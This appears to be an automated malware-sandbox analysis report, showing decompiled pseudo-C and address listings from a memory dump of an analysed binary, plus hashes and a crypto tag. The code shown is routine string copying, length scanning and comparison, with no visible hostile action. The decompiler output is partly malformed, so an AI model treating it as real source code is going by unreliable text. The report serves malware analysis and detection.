																											_t332 = _t331 & 0x8000003f;
																											__eflags = _t332;
																											if(_t332 < 0) {
																												_t332 = (_t332 - 0x00000001 | 0xffffffc0) + 1;
																												__eflags = _t332;
																											}
																											__eflags = _t332;
																											_t335 = _v68 + (0 | _t332 > 0x00000000) << 6;
																											_v68 = _t335;
																											_push(_t335);
																											_t469 = E00411030();
																											_t485 = _t485 + 4;
																											_t336 =  *_t284;
																											__eflags = _t336;
																											if(_t336 == 0) {
																												 *_t469 = 0;
																												goto L143;
																											} else {
																												__eflags = _t469;
																												if(_t469 == 0) {
																													L141:
																													_push(1);
																													_push(_t336);
																													E004110B0();
																													_t485 = _t485 + 8;
																													L143:
																													 *(_t284 + 4) = _v68;
																													 *_t284 = _t469;
																													L144:
																													__eflags = _t469;
																													if(_t469 == 0) {
																														goto L62;
																													}
																													_t262 = _v64;
																													_t337 = 0;
																													while(1) {
																														_t379 =  *_t262;
																														_t337 = _t337 + 1;
																														 *_t469 = _t379;
																														__eflags = _t434;
																														if(_t434 == 0) {
																															goto L149;
																														}
																														__eflags = _t337 - _t434;
																														if(_t337 == _t434) {
																															 *(_t469 + 1) = 0;
																															goto L62;
																														}
																														L149:
																														__eflags = _t379;
																														if(_t379 == 0) {
																															goto L62;
																														}
																														_t469 = _t469 + 1;
																														_t262 = _t262 + 1;
																														__eflags = _t262;
																													}
																												}
																												_t380 =  *_t336;
																												 *_t469 = _t380;
																												__eflags = _t380;
																												if(_t380 == 0) {
																													goto L141;
																												}
																												_t381 = 0;
																												__eflags = 0;
																												while(1) {
																													_t381 = _t381 + 1;
																													_t264 =  *((char*)(_t336 + _t381 * 2 - 1));
																													 *(_t469 + _t381 * 2 - 1) = _t264;
																													__eflags = _t264;
																													if(_t264 == 0) {
																														break;
																													}
																													_t265 =  *((char*)(_t336 + _t381 * 2));
																													 *(_t469 + _t381 * 2) = _t265;
																													__eflags = _t265;
																													if(_t265 != 0) {
																														continue;
																													}
																													break;
																												}
																												_t284 = _a4;
																												goto L141;
																											}
																										}
																										_t469 = 0;
																										goto L144;
																									}
																									_t382 = _t369 + _t258;
																									_v60 = _t382;
																									_t383 = _t382 & 0x0000000f;
																									__eflags = _t383;
																									if(_t383 == 0) {
																										L122:
																										_t434 =  ~( ~_t383 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																										__eflags = _t434;
																										while(1) {
																											asm("movdqu xmm1, [esi+edx]");
																											asm("pcmpeqb xmm1, xmm0");
																											asm("pmovmskb ecx, xmm1");
																											__eflags = _t326;
																											if(_t326 != 0) {
																												break;
																											}
																											_t383 = _t383 + 0x10;
																											__eflags = _t383 - _t434;
																											if(_t383 < _t434) {
																												continue;
																											}
																											__eflags = _t434 - 0x7fffffff;
																											if(_t434 >= 0x7fffffff) {
																												L129:
																												_t434 = 0x7fffffff;
																												goto L130;
																											}
																											_t384 = _v60;
																											while(1) {
																												__eflags =  *((char*)(_t434 + _t384));
																												if( *((char*)(_t434 + _t384)) == 0) {
																													goto L130;
																												}
																												_t434 = _t434 + 1;
																												__eflags = _t434 - 0x7fffffff;
																												if(_t434 < 0x7fffffff) {
																													continue;
																												}
																												goto L129;
																											}
																											goto L130;
																										}
																										asm("bsf edi, ecx");
																										_t434 = _t434 + _t383;
																										goto L130;
																									}
																									_t434 = 0;
																									_t326 = _v60;
																									_t383 =  ~_t383 + 0x10;
																									__eflags = _t383;
																									while(1) {
																										__eflags =  *((char*)(_t434 + _t326));
																										if( *((char*)(_t434 + _t326)) == 0) {
																											goto L130;
																										}
																										_t434 = _t434 + 1;
																										__eflags = _t434 - _t383;
																										if(_t434 < _t383) {
																											continue;
																										}
																										goto L122;
																									}
																									goto L130;
																								}
																								_t386 = _v60;
																								while(1) {
																									__eflags =  *((char*)(_t433 + _t386));
																									if( *((char*)(_t433 + _t386)) == 0) {
																										goto L115;
																									}
																									_t433 = _t433 + 1;
																									__eflags = _t433 - 0x7fffffff;
																									if(_t433 < 0x7fffffff) {
																										continue;
																									}
																									goto L114;
																								}
																								goto L115;
																							}
																							asm("bsf edi, edx");
																							_t284 = _a4;
																							_t433 = _t433 + _t468;
																							goto L115;
																						}
																						_t433 = 0;
																						_t365 = _v60;
																						_t468 =  ~_t468 + 0x10;
																						__eflags = _t468;
																						while(1) {
																							__eflags =  *((char*)(_t433 + _t365));
																							if( *((char*)(_t433 + _t365)) == 0) {
																								goto L115;
																							}
																							_t433 = _t433 + 1;
																							__eflags = _t433 - _t468;
																							if(_t433 < _t468) {
																								continue;
																							}
																							goto L107;
																						}
																						goto L115;
																					}
																					_t365 = _v28;
																					while(1) {
																						__eflags =  *(_t325 + _t365);
																						if( *(_t325 + _t365) == 0) {
																							goto L103;
																						}
																						_t325 = _t325 + 1;
																						__eflags = _t325 - 0x7fffffff;
																						if(_t325 < 0x7fffffff) {
																							continue;
																						}
																						goto L102;
																					}
																					goto L103;
																				}
																				asm("bsf ecx, esi");
																				_t325 = _t325 + _t365;
																				goto L103;
																			}
																			_t365 = _v32;
																			_t325 = 0;
																			__eflags = 0;
																			_t441 = _v28;
																			_t466 = _t365;
																			while(1) {
																				__eflags =  *((char*)(_t325 + _t441));
																				if( *((char*)(_t325 + _t441)) == 0) {
																					goto L103;
																				}
																				_t325 = _t325 + 1;
																				__eflags = _t325 - _t466;
																				if(_t325 < _t466) {
																					continue;
																				}
																				goto L95;
																			}
																			goto L103;
																		}
																		_t254 = _v36;
																		_t466 = _v40;
																		__eflags = _t319;
																		if(_t319 == 0) {
																			break;
																		}
																		_v36 = _t254;
																		_v40 = _t466;
																		_t390 = _v44;
																		_t268 = _v32;
																		do {
																			_t443 = _t390;
																			__eflags = _t390;
																			if(_t390 == 0) {
																				L169:
																				_t478 =  ~( ~_t443 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																				__eflags = _t478;
																				while(1) {
																					asm("movdqu xmm1, [eax+edi]");
																					asm("pcmpeqb xmm1, xmm0");
																					asm("pmovmskb ebx, xmm1");
																					__eflags = _t292;
																					if(_t292 != 0) {
																						break;
																					}
																					_t443 = _t443 + 0x10;
																					__eflags = _t443 - _t478;
																					if(_t443 < _t478) {
																						continue;
																					}
																					__eflags = _t478 - 0x7fffffff;
																					if(_t478 >= 0x7fffffff) {
																						L176:
																						_t478 = 0x7fffffff;
																						L177:
																						_v68 = _t478;
																						_t295 = 0;
																						__eflags = 0;
																						_v44 = _t390;
																						while(1) {
																							_t271 =  *((char*)(_t295 + _t319));
																							_t392 =  *((char*)(_t295 + _v28));
																							__eflags = _t271 - 0x61 - 0x19;
																							_t272 =  <=  ? _t271 - 0x20 : _t271;
																							__eflags = _t392 - 0x61 - 0x19;
																							_t273 =  <=  ? _t271 - 0x20 : _t271;
																							_t393 =  <=  ? _t392 - 0x20 : _t392;
																							_t394 =  <=  ? _t392 - 0x20 : _t392;
																							__eflags = _t273 - ( <=  ? _t392 - 0x20 : _t392);
																							if(__eflags < 0 || __eflags > 0) {
																								break;
																							}
																							__eflags = _t273;
																							if(_t273 == 0) {
																								L182:
																								_t254 = _v36;
																								_t466 = _v40;
																								L183:
																								__eflags = _t319;
																								if(_t319 != 0) {
																									goto L85;
																								}
																								goto L184;
																							}
																							_t295 = _t295 + 1;
																							__eflags = _t295 - _v68;
																							if(_t295 < _v68) {
																								continue;
																							}
																							goto L182;
																						}
																						_t365 = _v44;
																						_t466 = _t319 + 1;
																						__eflags = _t466;
																						if(_t466 == 0) {
																							goto L192;
																						}
																						__eflags = _v64 - 0x19;
																						_t297 =  <=  ? _v40 : _v48;
																						_t292 =  <=  ? _v40 : _v48;
																						__eflags =  *(_t319 + 1);
																						if( *(_t319 + 1) == 0) {
																							goto L192;
																						}
																						_v44 = _t365;
																						while(1) {
																							_t319 = _t319 + 1;
																							_t466 = _t466 + 1;
																							_t395 =  *_t319 & 0x000000ff;
																							__eflags =  *((char*)(_t466 - 1)) + 0xffffffbf - 0x19;
																							_t396 =  <=  ? _t395 + 0x20 : _t395;
																							__eflags = ( <=  ? _t395 + 0x20 : _t395) - _t292;
																							if(( <=  ? _t395 + 0x20 : _t395) == _t292) {
																								goto L191;
																							}
																							__eflags =  *_t466;
																							if( *_t466 != 0) {
																								continue;
																							}
																							goto L90;
																						}
																						goto L191;
																					}
																					_t298 = _v28;
																					while(1) {
																						__eflags =  *((char*)(_t478 + _t298));
																						if( *((char*)(_t478 + _t298)) == 0) {
																							break;
																						}
																						_t478 = _t478 + 1;
																						__eflags = _t478 - 0x7fffffff;
																						if(_t478 < 0x7fffffff) {
																							continue;
																						}
																						goto L176;
																					}
																					L193:
																					__eflags = _t478;
																					if(__eflags == 0) {
																						goto L176;
																					}
																					if(__eflags > 0) {
																						goto L177;
																					}
																					_v44 = _t390;
																					_t254 = _v36;
																					_t466 = _v40;
																					goto L183;
																				}
																				asm("bsf esi, ebx");
																				_t478 = _t478 + _t443;
																				goto L193;
																			}
																			_t292 = _v28;
																			_t443 = _t268;
																			_t478 = 0;
																			__eflags = 0;
																			while(1) {
																				__eflags =  *((char*)(_t478 + _t292));
																				if( *((char*)(_t478 + _t292)) == 0) {
																					goto L193;
																				}
																				_t478 = _t478 + 1;
																				__eflags = _t478 - _t268;
																				if(_t478 < _t268) {
																					continue;
																				}
																				goto L169;
																			}
																			goto L193;
																			L191:
																			_t390 = _v44;
																			_t268 = _v32;
																			__eflags = _t319;
																		} while (_t319 != 0);
																		L192:
																		_t254 = _v36;
																		_t284 = _a4;
																		goto L91;
																	}
																	L184:
																	_t365 = _v44;
																	goto L91;
																}
																_t288 = _t288 + 1;
																__eflags = _t288 - _v68;
																if(_t288 < _v68) {
																	continue;
																}
																goto L82;
															}
															_t362 = _v44;
															_t465 = _t319 + 1;
															__eflags = _t465;
															if(_t465 == 0) {
																goto L52;
															}
															__eflags = _v64 - 0x19;
															_t290 =  <=  ? _v40 : _v48;
															_t284 =  <=  ? _v40 : _v48;
															__eflags =  *(_t319 + 1);
															if( *(_t319 + 1) == 0) {
																goto L52;
															}
															_v44 = _t362;
															while(1) {
																_t319 = _t319 + 1;
																_t465 = _t465 + 1;
																_t363 =  *_t319 & 0x000000ff;
																__eflags =  *((char*)(_t465 - 1)) + 0xffffffbf - 0x19;
																_t364 =  <=  ? _t363 + 0x20 : _t363;
																__eflags = ( <=  ? _t363 + 0x20 : _t363) - _t284;
																if(( <=  ? _t363 + 0x20 : _t363) == _t284) {
																	goto L207;
																}
																__eflags =  *_t465;
																if( *_t465 != 0) {
																	continue;
																}
																goto L52;
															}
															goto L207;
														}
														_t299 = _v28;
														while(1) {
															__eflags =  *((char*)(_t461 + _t299));
															if( *((char*)(_t461 + _t299)) == 0) {
																break;
															}
															_t461 = _t461 + 1;
															__eflags = _t461 - 0x7fffffff;
															if(_t461 < 0x7fffffff) {
																continue;
															}
															goto L76;
														}
														L203:
														__eflags = _t461;
														if(__eflags == 0) {
															goto L76;
														}
														if(__eflags > 0) {
															goto L77;
														}
														_t466 = _v40;
														_t284 = _a4;
														goto L83;
													}
													asm("bsf esi, ebx");
													_t461 = _t461 + _t422;
													goto L203;
												}
												_t284 = _v28;
												_t422 = _t246;
												_t461 = 0;
												__eflags = 0;
												while(1) {
													__eflags =  *((char*)(_t461 + _t284));
													if( *((char*)(_t461 + _t284)) == 0) {
														goto L203;
													}
													_t461 = _t461 + 1;
													__eflags = _t461 - _t246;
													if(_t461 < _t246) {
														continue;
													}
													goto L69;
												}
												goto L203;
												L207:
												_t357 = _v44;
												_t246 = _v32;
												__eflags = _t319;
											} while (_t319 != 0);
											goto L52;
										}
										goto L39;
									}
									_t279 =  *_t344;
									 *_t311 = _t279;
									__eflags = _t279;
									if(_t279 == 0) {
										goto L33;
									}
									_v60 = _t413;
									_t280 = 0;
									__eflags = 0;
									_v64 = _t283;
									_v68 = _t449;
									while(1) {
										_t280 = _t280 + 1;
										_t301 =  *((char*)(_t344 + _t280 * 2 - 1));
										 *(_t311 + _t280 * 2 - 1) = _t301;
										__eflags = _t301;
										if(_t301 == 0) {
											break;
										}
										_t302 =  *((char*)(_t344 + _t280 * 2));
										 *(_t311 + _t280 * 2) = _t302;
										__eflags = _t302;
										if(_t302 != 0) {
											continue;
										}
										break;
									}
									_t413 = _v60;
									_t283 = _v64;
									_t449 = _v68;
									goto L33;
								}
							}
							_t311 = _v56;
							goto L36;
						}
						_t400 = _t406 & 0x0000000f;
						__eflags = _t400;
						if(_t400 == 0) {
							L15:
							asm("pxor xmm0, xmm0");
							_t308 =  ~( ~_t400 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							__eflags = _t308;
							while(1) {
								asm("movdqu xmm1, [edi+edx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb eax, xmm1");
								__eflags = _t231;
								if(_t231 != 0) {
									break;
								}
								_t400 = _t400 + 0x10;
								__eflags = _t400 - _t308;
								if(_t400 < _t308) {
									continue;
								}
								__eflags = _t308 - 0x7fffffff;
								if(_t308 >= 0x7fffffff) {
									L21:
									_t310 = 0x40;
									_t283 = 0x7fffffff;
									goto L22;
								} else {
									goto L19;
								}
								while(1) {
									L19:
									__eflags =  *((char*)(_t308 + _t406));
									if( *((char*)(_t308 + _t406)) == 0) {
										break;
									}
									_t308 = _t308 + 1;
									__eflags = _t308 - 0x7fffffff;
									if(_t308 < 0x7fffffff) {
										continue;
									}
									goto L21;
								}
								L209:
								__eflags = _t283 - 0xfffffffe;
								if(_t283 != 0xfffffffe) {
									_t310 = 0x40;
								} else {
									 *_t406 = 0;
									_t310 = _v52;
								}
								goto L22;
							}
							asm("bsf ebx, eax");
							_t283 = _t308 + _t400;
							goto L209;
						}
						_t283 = 0;
						_t400 =  ~_t400 + 0x10;
						__eflags = _t400;
						while(1) {
							__eflags =  *((char*)(_t283 + _t406));
							if( *((char*)(_t283 + _t406)) == 0) {
								goto L209;
							}
							_t283 = _t283 + 1;
							__eflags = _t283 - _t400;
							if(_t283 < _t400) {
								continue;
							}
							goto L15;
						}
						goto L209;
					}
					_t237 =  &_v56;
					goto L37;
				}
				if(_t406 == 0) {
					L6:
					_push(1);
					_push(_t230);
					E004110B0();
					_t485 = _t485 + 8;
					goto L8;
				}
				_t402 =  *_t230;
				 *_t406 = _t402;
				if(_t402 == 0) {
					goto L6;
				}
				_t340 = 0;
				while(1) {
					_t340 = _t340 + 1;
					_t403 =  *((char*)(_t230 + _t340 * 2 - 1));
					 *((char*)(_t406 + _t340 * 2 - 1)) = _t403;
					if(_t403 == 0) {
						goto L6;
					}
					_t404 =  *((char*)(_t230 + _t340 * 2));
					 *((char*)(_t406 + _t340 * 2)) = _t404;
					if(_t404 != 0) {
						continue;
					}
					goto L6;
				}
				goto L6;
			}

0x00422e6e
0x00422e72
0x00422e74
0x00422e78
0x00422e7f
0x00422e81
0x00422e84
0x00422e8a
0x00422ec1
0x00422ec4
0x00422ec4
0x00422ec8
0x00422ed0
0x00422ed6
0x00422ee1
0x00422ee3
0x004237d3
0x004237d8
0x00422f5d
0x00422f62
0x00422f62
0x00422f65
0x00422f68
0x00422f6b
0x00422f6d
0x00422f82
0x00422f85
0x00422f85
0x00422f8b
0x00422f93
0x00422f93
0x00422f93
0x00422f96
0x00422f9d
0x00422fa0
0x00422fa6
0x00422fa8
0x00422fab
0x00422faf
0x00422fb1
0x00423006
0x00000000
0x00422fb3
0x00422fb3
0x00422fb5
0x00422ff1
0x00422ff1
0x00422ff3
0x00422ff4
0x00422ff8
0x00422ffd
0x00423001
0x00423009
0x00423009
0x0042300d
0x00423011
0x00423015
0x00423018
0x0042301e
0x00423023
0x00423023
0x00423025
0x00423029
0x0042302e
0x0042303d
0x0042303d
0x00423041
0x00423043
0x0042304b
0x0042304d
0x00423050
0x00423054
0x0042308e
0x00423135
0x00423135
0x00423137
0x0042313e
0x0042313e
0x00423140
0x00423144
0x00423150
0x00423154
0x00423161
0x00423161
0x00423058
0x0042307e
0x0042307e
0x00423080
0x00423081
0x00423086
0x00000000
0x00423086
0x0042305a
0x0042305d
0x00423061
0x00000000
0x00000000
0x00423063
0x00423065
0x00423065
0x00423066
0x0042306b
0x00423071
0x00000000
0x00000000
0x00423073
0x00423077
0x0042307c
0x00000000
0x00000000
0x00000000
0x0042307c
0x00000000
0x00423065
0x00423032
0x00423035
0x0042303b
0x00423096
0x00423098
0x0042309c
0x0042309e
0x004230e4
0x004230e4
0x004230e8
0x004230ea
0x004230f2
0x004230f4
0x004230f7
0x004230f9
0x004230fb
0x00423132
0x00000000
0x00423132
0x004230fd
0x004230ff
0x00423125
0x00423125
0x00423127
0x00423128
0x0042312d
0x00000000
0x0042312d
0x00423101
0x00423104
0x00423106
0x00423108
0x00000000
0x00000000
0x0042310a
0x0042310a
0x0042310c
0x0042310c
0x0042310d
0x00423112
0x00423116
0x00423118
0x00000000
0x00000000
0x0042311a
0x0042311e
0x00423121
0x00423123
0x00000000
0x00000000
0x00000000
0x00423123
0x00000000
0x0042310c
0x004230a0
0x004230a3
0x00000000
0x00000000
0x004230a5
0x004230a7
0x004230a9
0x004230a9
0x004230ac
0x004230b0
0x004230b3
0x004230b6
0x004230b9
0x004230bc
0x004230bc
0x004230be
0x004230be
0x004230c4
0x004230ca
0x004230cd
0x004230cf
0x00000000
0x00000000
0x004230d5
0x004230d6
0x004230d7
0x004230db
0x004230df
0x00000000
0x00000000
0x004230e1
0x004230e1
0x00000000
0x004230e1
0x00423164
0x00423167
0x00423169
0x00000000
0x00000000
0x00423173
0x00423176
0x00423182
0x00423182
0x00423185
0x0042318c
0x00423190
0x00423192
0x00423192
0x00423194
0x00423196
0x004231af
0x004231bf
0x004231bf
0x004231c5
0x004231c5
0x004231ca
0x004231ce
0x004231d2
0x004231d4
0x00000000
0x00000000
0x004231da
0x004231dd
0x004231df
0x00000000
0x00000000
0x004231e5
0x004231eb
0x00423204
0x00423204
0x00423209
0x00423209
0x0042320c
0x0042320c
0x0042320e
0x00423212
0x00423216
0x0042321a
0x00423221
0x0042322a
0x0042322d
0x00423230
0x00423236
0x00423239
0x0042323c
0x0042323e
0x00000000
0x00000000
0x0042324a
0x0042324c
0x00423254
0x00423254
0x00423258
0x0042325c
0x0042325f
0x0042325f
0x00423261
0x00000000
0x00000000
0x00423267
0x0042326b
0x0042326b
0x0042326d
0x0042326f
0x0042326f
0x00423270
0x00000000
0x00000000
0x00423276
0x0042327a
0x00000000
0x00000000
0x00423280
0x00423289
0x0042328c
0x0042328f
0x00423293
0x00423297
0x00423297
0x00423298
0x00423299
0x004232a0
0x004232a3
0x004232a9
0x004232ac
0x004232ae
0x00000000
0x00000000
0x004232b4
0x004232b7
0x00000000
0x00000000
0x004232b9
0x004232b9
0x004232bd
0x004232c1
0x004232c4
0x004232c4
0x004232c6
0x004232df
0x004232ef
0x004232ef
0x004232f5
0x004232f5
0x004232fa
0x004232fe
0x00423302
0x00423304
0x00000000
0x00000000
0x0042330a
0x0042330d
0x0042330f
0x00000000
0x00000000
0x00423311
0x00423317
0x0042332c
0x0042332c
0x00423331
0x00423335
0x00423335
0x00423338
0x00423350
0x00423360
0x00423360
0x00423366
0x00423366
0x0042336b
0x0042336f
0x00423373
0x00423375
0x00000000
0x00000000
0x0042337b
0x0042337e
0x00423380
0x00000000
0x00000000
0x00423382
0x00423385
0x0042338b
0x004233a0
0x004233a0
0x004233a5
0x004233a5
0x004233ab
0x004233ad
0x004233af
0x004233b1
0x004233b3
0x004233b6
0x004233b8
0x004233bb
0x004233be
0x004233c0
0x004233c0
0x004233c2
0x004233c6
0x00423519
0x00423519
0x00423520
0x00423522
0x00423525
0x00423527
0x00423529
0x00423563
0x00000000
0x00423563
0x0042352b
0x0042352d
0x00423553
0x00423553
0x00423555
0x00423556
0x0042355b
0x00000000
0x0042355b
0x0042352f
0x00423532
0x00423534
0x00423536
0x00000000
0x00000000
0x00423538
0x00423538
0x0042353a
0x0042353a
0x0042353b
0x00423540
0x00423544
0x00423546
0x00000000
0x00000000
0x00423548
0x0042354c
0x0042354f
0x00423551
0x00000000
0x00000000
0x00000000
0x00423551
0x00000000
0x0042353a
0x004233cc
0x004233d0
0x004233d4
0x00000000
0x00000000
0x004233da
0x004233dc
0x00423451
0x00423456
0x00423456
0x00423459
0x0042345c
0x0042345f
0x00423461
0x00423477
0x0042347a
0x0042347a
0x00423480
0x00423488
0x00423488
0x00423488
0x0042348b
0x00423495
0x00423498
0x0042349b
0x004234a1
0x004234a3
0x004234a6
0x004234a8
0x004234aa
0x004234e4
0x00000000
0x004234ac
0x004234ac
0x004234ae
0x004234d7
0x004234d7
0x004234d9
0x004234da
0x004234df
0x004234e7
0x004234ea
0x004234ed
0x004234ef
0x004234ef
0x004234f1
0x00000000
0x00000000
0x004234f7
0x004234fb
0x00423501
0x00423501
0x00423504
0x00423505
0x00423507
0x00423509
0x00000000
0x00000000
0x0042350b
0x0042350d
0x0042356b
0x00000000
0x0042356b
0x0042350f
0x0042350f
0x00423511
0x00000000
0x00000000
0x004234ff
0x00423500
0x00423500
0x00423500
0x00423501
0x004234b0
0x004234b3
0x004234b5
0x004234b7
0x00000000
0x00000000
0x004234b9
0x004234b9
0x004234bb
0x004234bb
0x004234bc
0x004234c1
0x004234c5
0x004234c7
0x00000000
0x00000000
0x004234c9
0x004234cd
0x004234d0
0x004234d2
0x00000000
0x00000000
0x00000000
0x004234d2
0x004234d4
0x00000000
0x004234d4
0x004234aa
0x00423463
0x00000000
0x00423463
0x004233de
0x004233e0
0x004233e4
0x004233e4
0x004233e7
0x004233ff
0x0042340f
0x0042340f
0x00423415
0x00423415
0x0042341a
0x0042341e
0x00423422
0x00423424
0x00000000
0x00000000
0x0042342a
0x0042342d
0x0042342f
0x00000000
0x00000000
0x00423431
0x00423437
0x0042344c
0x0042344c
0x00000000
0x0042344c
0x00423439
0x0042343d
0x0042343d
0x00423441
0x00000000
0x00000000
0x00423443
0x00423444
0x0042344a
0x00000000
0x00000000
0x00000000
0x0042344a
0x00000000
0x0042343d
0x00423574
0x00423577
0x00000000
0x00423577
0x004233eb
0x004233ed
0x004233f1
0x004233f1
0x004233f4
0x004233f4
0x004233f8
0x00000000
0x00000000
0x004233fa
0x004233fb
0x004233fd
0x00000000
0x00000000
0x00000000
0x004233fd
0x00000000
0x004233f4
0x0042338d
0x00423391
0x00423391
0x00423395
0x00000000
0x00000000
0x00423397
0x00423398
0x0042339e
0x00000000
0x00000000
0x00000000
0x0042339e
0x00000000
0x00423391
0x0042357e
0x00423581
0x00423584
0x00000000
0x00423584
0x0042333c
0x0042333e
0x00423342
0x00423342
0x00423345
0x00423345
0x00423349
0x00000000
0x00000000
0x0042334b
0x0042334c
0x0042334e
0x00000000
0x00000000
0x00000000
0x0042334e
0x00000000
0x00423345
0x00423319
0x0042331d
0x0042331d
0x00423321
0x00000000
0x00000000
0x00423323
0x00423324
0x0042332a
0x00000000
0x00000000
0x00000000
0x0042332a
0x00000000
0x0042331d
0x0042358b
0x0042358e
0x00000000
0x0042358e
0x004232c8
0x004232cc
0x004232cc
0x004232ce
0x004232d2
0x004232d4
0x004232d4
0x004232d8
0x00000000
0x00000000
0x004232da
0x004232db
0x004232dd
0x00000000
0x00000000
0x00000000
0x004232dd
0x00000000
0x004232d4
0x00423595
0x00423599
0x0042359d
0x0042359f
0x00000000
0x00000000
0x004235a5
0x004235a9
0x004235ad
0x004235b1
0x004235b5
0x004235b5
0x004235b7
0x004235b9
0x004235d2
0x004235e2
0x004235e2
0x004235e8
0x004235e8
0x004235ed
0x004235f1
0x004235f5
0x004235f7
0x00000000
0x00000000
0x004235fd
0x00423600
0x00423602
0x00000000
0x00000000
0x00423608
0x0042360e
0x00423627
0x00423627
0x0042362c
0x0042362c
0x0042362f
0x0042362f
0x00423631
0x00423635
0x00423639
0x0042363d
0x00423644
0x0042364d
0x00423650
0x00423653
0x00423659
0x0042365c
0x0042365f
0x00423661
0x00000000
0x00000000
0x00423665
0x00423667
0x00423673
0x00423673
0x00423677
0x0042367b
0x0042367b
0x0042367d
0x00000000
0x00000000
0x00000000
0x0042367d
0x00423669
0x0042366a
0x0042366d
0x00000000
0x00000000
0x00000000
0x0042366d
0x0042368f
0x00423699
0x00423699
0x0042369a
0x00000000
0x00000000
0x0042369c
0x004236a5
0x004236aa
0x004236ad
0x004236b1
0x00000000
0x00000000
0x004236b3
0x004236b7
0x004236b7
0x004236b8
0x004236b9
0x004236c3
0x004236c9
0x004236cc
0x004236ce
0x00000000
0x00000000
0x004236d0
0x004236d3
0x00000000
0x00000000
0x00000000
0x004236d5
0x00000000
0x004236b7
0x00423610
0x00423614
0x00423614
0x00423618
0x00000000
0x00000000
0x0042361e
0x0042361f
0x00423625
0x00000000
0x00000000
0x00000000
0x00423625
0x004236fa
0x004236fa
0x004236fc
0x00000000
0x00000000
0x00423702
0x00000000
0x00000000
0x00423708
0x0042370c
0x00423710
0x00000000
0x00423710
0x00423719
0x00423720
0x00000000
0x00423720
0x004235bb
0x004235bf
0x004235c1
0x004235c1
0x004235c3
0x004235c3
0x004235c7
0x00000000
0x00000000
0x004235cd
0x004235ce
0x004235d0
0x00000000
0x00000000
0x00000000
0x004235d0
0x00000000
0x004236de
0x004236de
0x004236e2
0x004236e6
0x004236e6
0x004236ee
0x004236ee
0x004236f2
0x00000000
0x004236f2
0x00423683
0x00423683
0x00000000
0x00423687
0x0042324e
0x0042324f
0x00423252
0x00000000
0x00000000
0x00000000
0x00423252
0x00423724
0x0042372e
0x0042372e
0x0042372f
0x00000000
0x00000000
0x00423735
0x0042373e
0x00423743
0x00423746
0x0042374a
0x00000000
0x00000000
0x00423750
0x00423754
0x00423754
0x00423755
0x00423756
0x00423760
0x00423766
0x00423769
0x0042376b
0x00000000
0x00000000
0x0042376d
0x00423770
0x00000000
0x00000000
0x00000000
0x00423772
0x00000000
0x00423754
0x004231ed
0x004231f1
0x004231f1
0x004231f5
0x00000000
0x00000000
0x004231fb
0x004231fc
0x00423202
0x00000000
0x00000000
0x00000000
0x00423202
0x00423777
0x00423777
0x00423779
0x00000000
0x00000000
0x0042377f
0x00000000
0x00000000
0x00423785
0x00423789
0x00000000
0x00423789
0x00423791
0x00423798
0x00000000
0x00423798
0x00423198
0x0042319c
0x0042319e
0x0042319e
0x004231a0
0x004231a0
0x004231a4
0x00000000
0x00000000
0x004231aa
0x004231ab
0x004231ad
0x00000000
0x00000000
0x00000000
0x004231ad
0x00000000
0x0042379c
0x0042379c
0x004237a0
0x004237a4
0x004237a4
0x00000000
0x004237ac
0x00000000
0x0042303b
0x00422fb7
0x00422fba
0x00422fbc
0x00422fbe
0x00000000
0x00000000
0x00422fc0
0x00422fc4
0x00422fc4
0x00422fc6
0x00422fca
0x00422fcd
0x00422fcd
0x00422fce
0x00422fd3
0x00422fd7
0x00422fd9
0x00000000
0x00000000
0x00422fdb
0x00422fdf
0x00422fe2
0x00422fe4
0x00000000
0x00000000
0x00000000
0x00422fe4
0x00422fe6
0x00422fea
0x00422fee
0x00000000
0x00422fee
0x00422fb1
0x00422f6f
0x00000000
0x00422f6f
0x00422eeb
0x00422eeb
0x00422eee
0x00422f06
0x00422f0a
0x00422f16
0x00422f16
0x00422f1c
0x00422f1c
0x00422f21
0x00422f25
0x00422f29
0x00422f2b
0x00000000
0x00000000
0x00422f31
0x00422f34
0x00422f36
0x00000000
0x00000000
0x00422f38
0x00422f3e
0x00422f53
0x00422f53
0x00422f58
0x00000000
0x00000000
0x00000000
0x00000000
0x00422f40
0x00422f40
0x00422f40
0x00422f44
0x00000000
0x00000000
0x00422f4a
0x00422f4b
0x00422f51
0x00000000
0x00000000
0x00000000
0x00422f51
0x004237b1
0x004237b1
0x004237b4
0x004237c2
0x004237b6
0x004237b6
0x004237b9
0x004237b9
0x00000000
0x004237b4
0x004237cc
0x004237cf
0x00000000
0x004237cf
0x00422ef2
0x00422ef4
0x00422ef4
0x00422ef7
0x00422ef7
0x00422efb
0x00000000
0x00000000
0x00422f01
0x00422f02
0x00422f04
0x00000000
0x00000000
0x00000000
0x00422f04
0x00000000
0x00422ef7
0x00422ed8
0x00000000
0x00422ed8
0x00422e8e
0x00422eb4
0x00422eb4
0x00422eb6
0x00422eb7
0x00422ebc
0x00000000
0x00422ebc
0x00422e90
0x00422e93
0x00422e97
0x00000000
0x00000000
0x00422e99
0x00422e9b
0x00422e9b
0x00422e9c
0x00422ea1
0x00422ea7
0x00000000
0x00000000
0x00422ea9
0x00422ead
0x00422eb2
0x00000000
0x00000000
0x00000000
0x00422eb2
0x00000000

Strings

@, xrefs: 00422EC8

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 115c3439d82789a76028cc64ba03a0b0cd7b01c7d0591427b9fbd30026037de6
Instruction ID: d90bc048d916fdc26823b505e41617575af7fe8e3f9fd7993d40a1b19cacd4a4
Opcode Fuzzy Hash: 115c3439d82789a76028cc64ba03a0b0cd7b01c7d0591427b9fbd30026037de6
Instruction Fuzzy Hash: 3C523A71B083A29BC715CE28D48032BBBF26FC5315F99865EE8954B396D63CCE41C786

Uniqueness

Uniqueness Score: -1.00%

Function 0041D030, Relevance: 2.0, Strings: 1, Instructions: 789
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E0041D030(void* __ecx, signed int* _a4) {
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				unsigned int _v60;
				signed int _v64;
				signed int _v68;
				unsigned int _t225;
				signed int _t230;
				signed int _t231;
				void* _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t246;
				signed int _t247;
